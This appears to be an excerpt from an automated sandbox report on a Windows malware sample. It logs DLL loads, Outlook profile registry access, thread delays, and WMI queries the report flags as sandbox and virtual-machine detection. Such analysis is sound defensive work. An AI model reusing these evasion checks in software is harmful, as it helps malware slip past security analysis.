Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 73ybGtnYXx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 73ybGtnYXx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 73ybGtnYXx.exe

Static PE information: 0xE7D68599 [Fri Apr 3 11:16:41 2093 UTC]

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936AB3FBB push ebx; iretd		0_2_00007FF936AB400A
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Code function: 0_2_00007FF936AB403D push ebx; iretd		0_2_00007FF936AB400A

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 60233 -> 9000

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Memory allocated: 1B60E120000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Memory allocated: 1B627C00000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599120	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 595562	Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Window / User API: threadDelayed 3401			Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Window / User API: threadDelayed 6449			Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599120s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -599016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe TID: 7588	Thread sleep time: -595562s >= -30000s	Jump to behavior

